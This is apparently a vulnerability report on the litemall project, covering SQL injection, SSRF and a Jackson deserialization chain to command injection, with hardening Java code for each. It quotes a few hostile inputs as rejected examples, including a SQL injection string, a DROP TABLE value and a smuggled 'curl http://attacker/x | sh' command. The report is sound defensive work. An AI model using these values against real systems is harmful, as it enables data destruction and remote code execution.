1.
Don't rely too much on MyBatis Generator: the Example classes it generates splice the ORDER BY clause (setOrderByClause) into the SQL as a raw string, which becomes a SQL injection point as soon as that string is built from a request parameter.
In addition, receiving parameters with "${}" substitutes them into the SQL text, so MyBatis cannot execute the statement in precompiled (prepared) form; this leads to SQL injection risk. Use "#{}", which binds the value as a JDBC parameter, and reserve "${}" for identifiers that have been checked against an allow-list.
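The following mapper is an added example written for this report, not code from litemall: it shows the "${}" pattern next to the "#{}" fix, and the allow-list that is needed for the one case (sort column and direction) where "${}" is unavoidable because JDBC cannot bind identifiers. The table and column names are assumed for illustration.

```java
import java.util.List;
import java.util.Map;
import java.util.Set;
import org.apache.ibatis.annotations.Mapper;
import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;

@Mapper
public interface GoodsSearchMapper {

    // VULNERABLE (kept only for contrast): ${} is string-substituted into the SQL text
    // before it reaches the driver, so name = "' OR 1=1 -- " becomes part of the query.
    @Select("SELECT id, name FROM litemall_goods WHERE name LIKE '%${name}%'")
    List<Map<String, Object>> findByNameUnsafe(@Param("name") String name);

    // SAFE: #{} becomes a JDBC '?' placeholder; the value is bound, never parsed as SQL.
    // The wildcards are added inside the SQL with CONCAT so the parameter stays a pure value.
    @Select("SELECT id, name FROM litemall_goods WHERE name LIKE CONCAT('%', #{name}, '%')")
    List<Map<String, Object>> findByName(@Param("name") String name);

    // Identifiers (column names, sort direction) cannot be bound with #{}, which is why
    // generated orderByClause-style code falls back to ${}. Restrict them to an allow-list
    // before they are spliced in. Column names are assumed for this example.
    Set<String> SORT_COLUMNS = Set.of("id", "name", "add_time");

    static String safeOrderBy(String sort, String order) {
        if (sort == null || !SORT_COLUMNS.contains(sort)) {
            throw new IllegalArgumentException("unsupported sort column");
        }
        String dir = "desc".equalsIgnoreCase(order) ? "DESC" : "ASC";
        return sort + " " + dir;
    }

    // Only ever called with the output of safeOrderBy(), never with raw request input.
    @Select("SELECT id, name FROM litemall_goods ORDER BY ${orderBy}")
    List<Map<String, Object>> listOrdered(@Param("orderBy") String orderBy);
}
```

Call it as mapper.listOrdered(GoodsSearchMapper.safeOrderBy(sort, order)); a request with sort = "id; DROP TABLE litemall_goods" is rejected before any SQL is built.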
2.
In org.linlinjava.litemall.core.qcode.QCodeService#drawPicture, an unchecked URL is passed to ImageIO.read, which fetches it from the server side; this is SSRF. Two sources can flow to this sink.
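As an added example (not the project's code), this is the kind of check that should sit in front of ImageIO.read when the URL comes from a request: restrict the scheme, require the host to be on an allow-list, and refuse hosts that resolve to internal addresses. The host names in ALLOWED_HOSTS are assumptions.

```java
import java.awt.image.BufferedImage;
import java.io.IOException;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Locale;
import java.util.Set;
import javax.imageio.ImageIO;

public final class SafeImageFetcher {

    // Hosts the application genuinely expects to load pictures from (assumed names).
    private static final Set<String> ALLOWED_HOSTS =
            Set.of("static.example.com", "cdn.example.com");

    /** Returns the URL if it is acceptable to fetch server-side, otherwise throws. */
    public static URL validate(String raw) throws IOException {
        URL url;
        try {
            url = new URL(raw);
        } catch (MalformedURLException e) {
            throw new IOException("not a URL", e);
        }
        // ImageIO.read(URL) opens anything URL.openStream() understands (file:, jar:, ftp:, ...).
        if (!"https".equalsIgnoreCase(url.getProtocol())) {
            throw new IOException("scheme not allowed: " + url.getProtocol());
        }
        if (url.getUserInfo() != null) {
            throw new IOException("credentials in URL not allowed");
        }
        String host = url.getHost().toLowerCase(Locale.ROOT);
        if (!ALLOWED_HOSTS.contains(host)) {
            throw new IOException("host not allowed: " + host);
        }
        // Defence in depth: even an allow-listed name must not resolve to an internal address.
        for (InetAddress addr : InetAddress.getAllByName(host)) {
            if (addr.isLoopbackAddress() || addr.isSiteLocalAddress()
                    || addr.isLinkLocalAddress() || addr.isAnyLocalAddress()) {
                throw new IOException("host resolves to an internal address: " + addr);
            }
        }
        return url;
    }

    public static BufferedImage fetch(String raw) throws IOException {
        URL url = validate(raw);
        // The name is resolved again inside ImageIO.read, which leaves a DNS-rebinding
        // window; the host allow-list above is what actually closes that gap.
        BufferedImage img = ImageIO.read(url);
        if (img == null) {
            throw new IOException("response was not a decodable image");
        }
        return img;
    }
}
```

Note that isSiteLocalAddress() only covers the RFC 1918 ranges; if the deployment uses other internal ranges (for example cloud metadata endpoints beyond 169.254.0.0/16, or IPv6 unique local addresses), extend the address check accordingly. Also, HttpURLConnection follows same-scheme redirects, so the allow-list must be applied to the final host; the simplest way to get that guarantee is to fetch with a client that has redirects disabled.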
3.
The version of Jackson used in the project is vulnerable, and multiple sources can flow to the sink in org.linlinjava.litemall.core.util.JacksonUtil#toMap.
Through unsafe deserialization, an attacker can reach org.linlinjava.litemall.db.util.DbUtil#backup by reflection and inject custom commands through its String db parameter, finally causing RCE.
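The chain in item 3 has two ends that can each be closed: the JSON parser must not let input choose the class it instantiates, and the backup routine must not let its database-name argument reach a shell. The class below is an added example written for this report, not code from litemall; the package prefix given to the type validator and the mysqldump option-file path are assumptions.

```java
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import java.io.File;
import java.io.IOException;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public final class HardenedChain {

    // --- Source side: a JSON-to-map helper that cannot be steered to arbitrary classes ---

    private static final ObjectMapper MAPPER = JsonMapper.builder()
            // Default typing stays off (never call activateDefaultTyping/enableDefaultTyping),
            // so the JSON cannot name a Java class to instantiate. The validator is a second
            // fence in case polymorphic typing is enabled somewhere later: only subtypes under
            // the (assumed) application package are ever accepted.
            .polymorphicTypeValidator(BasicPolymorphicTypeValidator.builder()
                    .allowIfSubType("com.example.dto.")
                    .build())
            .build();

    /** Parses a JSON object into plain Map/List/String/Number/Boolean values only. */
    public static Map<String, Object> toMap(String body) throws IOException {
        return MAPPER.readValue(body, new TypeReference<Map<String, Object>>() {});
    }

    // --- Sink side: a database name that is never interpreted by a shell ---

    // A MySQL schema name we are willing to back up: letters, digits and underscore only.
    private static final Pattern DB_NAME = Pattern.compile("^[A-Za-z0-9_]{1,64}$");

    /**
     * Builds the mysqldump invocation as an argument vector. No shell is involved, so
     * characters such as ';', '|' or '$(' in db would stay literal anyway; the regex
     * rejects them so the name can also be used safely in the output file name.
     */
    public static List<String> backupCommand(String db, File outFile) {
        if (db == null || !DB_NAME.matcher(db).matches()) {
            throw new IllegalArgumentException("invalid database name");
        }
        // Credentials come from an option file (assumed path) rather than the command line,
        // where they would be visible in the process list. --defaults-extra-file must be first.
        return List.of("mysqldump",
                "--defaults-extra-file=/etc/litemall/backup.cnf",
                "--result-file=" + outFile.getPath(),
                db);
    }

    public static int runBackup(String db, File outFile) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(backupCommand(db, outFile))
                .redirectErrorStream(true)
                .start();
        return p.waitFor();
    }
}
```

Neither change replaces the version upgrade: the gadget classes that make polymorphic deserialization exploitable are blocked by the jackson-databind release line itself, so check the resolved version with mvn dependency:tree and move to a release that is not listed in the Jackson advisories. A request that carries db = "litemall; curl http://attacker/x | sh" is now rejected by backupCommand before any process is started.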